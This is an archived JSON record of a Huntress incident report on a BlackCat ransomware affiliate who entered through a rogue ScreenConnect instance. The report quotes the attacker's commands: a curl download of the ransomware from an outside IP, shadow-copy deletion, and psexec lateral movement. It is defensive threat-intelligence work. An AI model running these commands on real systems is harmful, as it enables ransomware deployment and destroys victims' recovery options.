{
	"id": "2e6c8ca7-a873-40ee-9a60-011891d9e1b1",
	"created_at": "2026-04-06T00:17:29.295007Z",
	"updated_at": "2026-04-10T13:12:26.342492Z",
	"deleted_at": null,
	"sha1_hash": "aaaf557806be6c849e74424ace8bf8c780e1c67c",
	"title": "BlackCat Ransomware Affiliate TTPs | Huntress",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 52257,
	"plain_text": "BlackCat Ransomware Affiliate TTPs | Huntress\r\nArchived: 2026-04-02 10:46:50 UTC\r\nBackground\r\nOn December 19, 2023, the Justice Department Office of Public Affairs issued a press release indicating that the\r\nFBI had “disrupted the ALPHV/BlackCat ransomware variant.” This variant of ransomware is offered to affiliates\r\nas “ransomware-as-a-service” (RaaS). The FBI also developed a decryption tool that was made available to\r\norganizations impacted by this RaaS variant, in an effort to help them recover and resume business operations. \r\nOn February 19, 2024, ConnectWise published a security advisory for ScreenConnect version 23.9.8, referencing\r\ntwo vulnerabilities and software weaknesses. Two days later, on February 21, Huntress published a blog\r\nexplaining the ScreenConnect authentication bypass.\r\nOn February 27, Wired.com published an article addressing how ransomware groups were “bouncing back faster”\r\nfollowing law enforcement disruption. On the same day, the Cybersecurity \u0026 Infrastructure Security Agency\r\n(CISA) published an advisory regarding the ALPHV/BlackCat ransomware, and included references to\r\nScreenConnect (see table 4, “Network Indicators”, in the advisory).\r\nThe Attack\r\nHuntress has an extremely diverse customer base, spanning a wide range of geographic locations and business\r\nverticals. On February 22, 2024, Huntress SOC analysts responded to alerts from an endpoint, apparently\r\nassociated with the healthcare community, indicating that Ransomware Canary files had been modified. A closer\r\nlook identified a compromised ScreenConnect instance, as well as Huntress Managed Antivirus alerts, indicating\r\nthat an attempt had been made to drop a ransomware executable file, identified as “BlackCat,” on the endpoint.\r\nThe endpoint was identified as “apparently” associated with the healthcare community, based on the customer\r\nname. 
As the investigation proceeded, the MSP partner stated that the endpoint had been removed from the\r\ncustomer environment and given to someone else without their knowledge. Even so, the agent continued to report\r\nback to the Huntress infrastructure and generate alerts. \r\nA deeper investigation into the endpoint revealed that the endpoint had two ScreenConnect instances running.\r\nFrom the available logs, the first ScreenConnect instance, which reported back to the MSP infrastructure and was\r\nlikely legitimate, was installed on November 10, 2021. At that time, the installed ScreenConnect version was\r\n20.10.957.7556. On February 20, 2024, this instance was updated to version 23.9.8.8811.\r\nThe second ScreenConnect instance, which had been identified as likely being a compromised installation, was\r\ninstalled on March 28, 2022. At the time, the version was 21.15.6764.8075. This version number was still being\r\nreported in log messages as recently as February 10, 2024. Further, this ScreenConnect instance connected to\r\nREDACTED.ddns.net.\r\nhttps://www.huntress.com/blog/blackcat-ransomware-affiliate-ttps\r\nPage 1 of 4\n\nAttack Timing\r\nThe threat actor accessed the endpoint via the second ScreenConnect instance. Available logs indicated that\r\nshortly after the instance was installed on March 28, 2022, a specific username connected to the instance; those\r\nsame logs indicated sequences of the username being used to connect, and then later disconnecting until July 29,\r\n2022. From that point until February 10, 2024, the only log messages indicated that this ScreenConnect instance\r\nexperienced SocketException errors, and likely failed to connect to REDACTED.ddns.net. On February 10, 2024,\r\nlogs illustrated a number of application errors and popup messages associated with this ScreenConnect instance;\r\nhowever, the logs do not provide sufficient detail to enumerate the specific issue the application encountered. 
\r\nOn February 22, 2024, a new username, chlsln14, connected to the ScreenConnect instance. At this point, the\r\nversion of the ScreenConnect instance was still reported, via EDR telemetry, as 21.15.6764.8075. At 14:09:41\r\nUTC, the following command was executed:\r\ncurl  http://94.131.109[.]54:6531/iw0pjCKEzADKTMA5Xkv8ZxS6.exe -O\r\nTwenty-three seconds later, the file C:\\Windows\\System32\\iw0pjCKEzADKTMA5Xkv8ZxS6.exe was detected\r\nby Windows Defender, and the file was successfully quarantined at 14:10:31 UTC. \r\nAt 14:11:46 UTC, the Windows Defender SpyNetReporting value was changed from 2 to 0, essentially disabling\r\nthe functionality. As there was no associated command line process observed in EDR telemetry, this modification\r\nwas likely the result of graphical user interface (GUI) interaction; that is to say that the threat actor likely made the\r\nmodification via the user interface. Following this log entry, there were several consecutive SecurityCenter log\r\nentries indicating that the state of Windows Defender was “snoozed.” \r\nAt 14:11:56 UTC, the original curl command was again executed, and appears to have succeeded because 23\r\nseconds later, the following command was launched:\r\niw0pjCKEzADKTMA5Xkv8ZxS6.exe  --access-token\r\nd72766a868fef87c0c073c1ec3b6a92b7daed7313b81ee6523386049f768b09d\r\nFor the uninitiated, one of the aspects of RaaS ransomware products is that the executable files will often contain\r\nembedded commands used to disable security products and obviate recovery. After all, how effective is\r\nransomware deployment if the impacted organization can simply recover by reverting the last restore point or\r\nvolume shadow copy? As such, once the ransomware executable was launched, the embedded processes were\r\nlaunched as child processes of iw0pjCKEzADKTMA5Xkv8ZxS6.exe, and many were detected by the Huntress\r\nplatform. 
\r\nThe commands observed via EDR telemetry included the following:\r\nvssadmin.exe Delete Shadows /all /quiet\r\nreg add HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\LanmanServer\\Parameters /v\r\nMaxMpxCt /d 65535 /t REG_DWORD /f\r\niisreset.exe /stop\r\nwmic.exe  Shadowcopy Delete\r\nThe reg add command modifying the MaxMpxCt value increases the number of permitted outstanding network\r\nrequests, apparently optimizing the file sharing network to handle a higher volume of traffic. \r\nAt this point, logs indicated that the chlsln14 user disconnected from the ScreenConnect session, and the\r\nransomware executable continued to run. Subsequent to the above commands, Huntress EDR telemetry illustrated\r\nseveral instances of the following command:\r\nC:\\Windows\\TEMP\\psexec.exe\" -nobanner -accepteula \\\\\u003cNetBIOS Name\u003e -u \u003cDOMAIN\u003e\\Administrator -\r\np \u003cpassword\u003e -s -d -f -c C:\\Windows\\system32\\iw0pjCKEzADKTMA5Xkv8ZxS6.exe --access-token\r\nd72766a868fef87c0c073c1ec3b6a92b7daed7313b81ee6523386049f768b09d --no-prop-servers \\\\\u003cNetBIOS\r\nName\u003e --propagated\r\nThese commands, which were child processes of the ransomware executable process, were clearly intended to\r\nallow the ransomware to move laterally to other endpoints in the infrastructure. Following these commands,\r\nWindows Event Log records indicated instances of successful propagation to the additional endpoints, all of which\r\nutilized the 10.x.x.x IP addressing scheme. This was very important, as the \u003cDOMAIN\u003e field and NetBIOS\r\nnames of remote endpoints could not be directly associated with the Huntress customer. Further, that Huntress\r\ncustomer utilized the 192.168.x.x IP addressing scheme within their infrastructure. 
Finally, during the\r\ninvestigation, no other endpoints within the Huntress customer’s infrastructure showed similar signs of\r\ncompromise, nor of file encryption.\r\nSummary\r\nThe threat actor was connected to the endpoint via the second identified ScreenConnect instance for just under\r\nthree minutes, and during that time was able to download a copy of the ransomware executable to the endpoint,\r\nreact to the file being quarantined by temporarily disabling Windows Defender, and then download the\r\nexecutable file again and successfully launch it. The ransomware executable file, being a RaaS product,\r\ncontained a number of embedded commands intended to inhibit or obviate recovery, as well as embedded\r\ncommands and credentials that allowed the ransomware executable to move laterally within the impacted\r\ninfrastructure. The commands allowed the executable to target named endpoints specific to the infrastructure in\r\nwhich the endpoint resided, indicating that the infrastructure was familiar to the threat actor.\r\nThis incident clearly demonstrates the need for an accurate, up-to-date asset inventory, one that includes not just\r\nphysical and virtual systems, but also all available applications and services, for patching purposes. 
It also\r\ndemonstrates the need for attack surface reduction, where administrators restrict access to or simply remove\r\nunnecessary applications and services, as these can provide either an easy, alternate means of access, or a means to\r\naccess the endpoint that bypasses protection mechanisms such as MFA.\r\nIndicators\r\nUse of curl.exe\r\n94.131.109[.]54:6531 - file download\r\niw0pjCKEzADKTMA5Xkv8ZxS6.exe - ransomware executable\r\nRaaS commands:\r\nvssadmin.exe Delete Shadows /all /quiet\r\nreg add HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\LanmanServer\\Parameters /v\r\nMaxMpxCt /d 65535 /t REG_DWORD /f\r\niisreset.exe /stop\r\nwmic.exe  Shadowcopy Delete\r\npsexec.exe\r\nMITRE ATT\u0026CK Mapping\r\nInitial Access - T1190, Exploit Public Facing Application (likely); T1078.002, Valid Domain Accounts\r\nExecution - T1059.003, Windows Command Shell\r\nDefense Evasion - T1562.001, Disable/Modify Tools\r\nPrivilege Escalation - T1078.002, Valid Domain Accounts\r\nImpact - T1486, Data Encrypted For Impact \r\nImpact - T1490, Inhibit System Recovery\r\nSource: https://www.huntress.com/blog/blackcat-ransomware-affiliate-ttps",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MITRE"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://www.huntress.com/blog/blackcat-ransomware-affiliate-ttps"
	],
	"report_names": [
		"blackcat-ransomware-affiliate-ttps"
	],
	"threat_actors": [
		{
			"id": "6e23ce43-e1ab-46e3-9f80-76fccf77682b",
			"created_at": "2022-10-25T16:07:23.303713Z",
			"updated_at": "2026-04-10T02:00:04.530417Z",
			"deleted_at": null,
			"main_name": "ALPHV",
			"aliases": [
				"ALPHV",
				"ALPHVM",
				"Ambitious Scorpius",
				"BlackCat Gang",
				"UNC4466"
			],
			"source_name": "ETDA:ALPHV",
			"tools": [
				"ALPHV",
				"ALPHVM",
				"BlackCat",
				"GO Simple Tunnel",
				"GOST",
				"Impacket",
				"LaZagne",
				"MEGAsync",
				"Mimikatz",
				"Munchkin",
				"Noberus",
				"PsExec",
				"Remcom",
				"RemoteCommandExecution",
				"WebBrowserPassView"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434649,
	"ts_updated_at": 1775826746,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/aaaf557806be6c849e74424ace8bf8c780e1c67c.pdf",
		"text": "https://archive.orkl.eu/aaaf557806be6c849e74424ace8bf8c780e1c67c.txt",
		"img": "https://archive.orkl.eu/aaaf557806be6c849e74424ace8bf8c780e1c67c.jpg"
	}
}